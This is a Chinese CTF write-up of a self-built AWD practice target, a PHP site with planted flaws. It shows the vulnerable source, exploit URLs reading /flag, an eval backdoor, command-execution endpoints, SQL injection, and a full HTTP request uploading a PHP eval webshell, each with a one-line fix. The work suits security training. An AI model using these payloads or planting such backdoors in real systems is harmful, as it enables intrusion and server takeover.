前言
此篇是以👉个人AWD的搭建为靶场的WP,
一.开始准备工作
口令
team1:ctf:02bc53734d16dca2a72a5ebaa11ec09c修改密码
$ python -c "import pty; pty.spawn('/bin/bash')"
ctf@873f0a4628bd:/$ passwd
Changing password for ctf.
(current) UNIX password:
Enter new UNIX password:
Retype new UNIX password:
passwd: password updated successfully
ctf@873f0a4628bd:/$ 打包源码和下载
tar -zcvf /html.tar.gz /var/www/html/*也可以使用WINSCP来下载
二.代码审计和分析
使用Seay源代码审计系统来审计源代码
那么就按照上面显示的来操作。
1.文件包含漏洞
漏洞位置/about.php,源码👇
<?php
$file=$_GET['file'];
include $file;
?>漏洞利用
http://192.168.1.25:8801/about.php?file=../flag如下图
修复方法:注释代码或者删掉代码
2.代码执行漏洞或者WEBSHELL
漏洞位置/config.php,源码👇
@eval($_REQUEST['c']);2.1.漏洞利用代码执行
http://192.168.1.25:8801/config.php?c=system(%27cat%20/flag%27);如下图
2.2WEBSHELL
可以直接使用蚁剑直接连接,然后查看flag,如下图
修复方法:注释代码或者删掉代码
3.任意文件读取漏洞
漏洞位置/contact.php,源代码👇
<?php
include 'header.php';
$file_path = $_GET['path'];
if(file_exists($file_path)){
$fp = fopen($file_path,"r");
$str = fread($fp,filesize($file_path));
echo $str = str_replace("\r\n","<br />",$str);
?>漏洞利用
http://192.168.1.25:8801/contact.php?path=../flag如下图
修复方法:注释代码或者删掉代码
4.任意命令执行漏洞
漏洞位置/footer.php,源码👇
<?php
$shell=$_POST['shell'];
system($shell);
if($shell !=""){
exit();
}
?>漏洞利用
修复方法:注释代码或者删掉代码
5.代码执行漏洞和WEBSHELL
和第2条一样
6.SQL注入
漏洞位置/search.php,源码👇
<?php
include 'header.php';
include_once('config.php');
if (!empty($_GET['id'])) {
$id=$_GET['id'];
$query = "SELECT * FROM news WHERE id=$id";
$data = mysqli_query($dbc,$query);
}
$com = mysqli_fetch_array($data);
?>可以直接使用sqlmap直接梭哈
http://192.168.1.25:8801/search.php?id=1当然也可以手工
http://192.168.1.25:8801/search.php?id=1 and 1=27.flag信息泄露
漏洞位置/admin/index.php成功登录admin后台,显示大大的flag
解决办法:注释掉显示flag代码
<h3>flag:<?php system("cat /flag")?></h3>8.admin页面页脚的命令执行漏洞
漏洞位置/admin/footer.php,源码👇
<?php
$shell=$_POST['shell'];
system($shell);
if($shell !=""){
exit();
}
?>漏洞利用
修复方法:注释代码或者删掉代码
9.admin页面页头的命令执行漏洞
漏洞位置/admin/header.php,源码👇
<?php
$p=$_GET['p'];
echo $p;
$q=exec($p);
var_dump($q);
?>漏洞利用
http://192.168.1.25:8801/admin/header.php?p=cat%20/flag修复方法:注释代码或者删掉代码
10.文件上传漏洞
漏洞位置/admin/upload.php,源码👇
$error=$_FILES['pic']['error'];
$tmpName=$_FILES['pic']['tmp_name'];
$name=$_FILES['pic']['name'];
$size=$_FILES['pic']['size'];
$type=$_FILES['pic']['type'];
try{
if($name!=="")
{
$name1=substr($name,-4);
if(is_uploaded_file($tmpName)){
$time=time();
$rootpath='./upload/'.$time.$name1;
$file=fopen($tmpName, "r") or die('No such file!');
$content=fread($file, filesize($tmpName));
if(strstr($content,'fuck')){
exit("<script language='JavaScript'>alert('You should not do this!');window.location='index.php?page=submit'</script>");
}
if(!move_uploaded_file($tmpName,$rootpath)){
echo "<script language='JavaScript'>alert('文件移动失败!');window.location='index.php?page=submit'</script>";
exit;
}
}
echo "上传成功:/upload/".$time.$name1;
}
}
catch(Exception $e)
{
echo "ERROR";
}漏洞利用,可以使用BP抓包,下面是修改OK的数据包👇
POST /admin/upload.php HTTP/1.1
Host: 192.168.1.25:8801
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:98.0) Gecko/20100101 Firefox/98.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------118835706019209069013990968177
Content-Length: 262
Origin: http://192.168.1.25:8801
Connection: close
Referer: http://192.168.1.25:8801/admin/
Cookie: PHPSESSID=a1anlfie5us1ed2okouv4b4ji6
Upgrade-Insecure-Requests: 1
-----------------------------118835706019209069013990968177
Content-Disposition: form-data; name="pic"; filename="shell.php"
Content-Type: application/octet-stream
<?php @eval($_POST[pass]);?>
-----------------------------118835706019209069013990968177--
上传成功吼路径位置上传成功:/upload/1647411313.php ,然后蚁剑连接即可。
修复方法:注释代码或者删掉代码
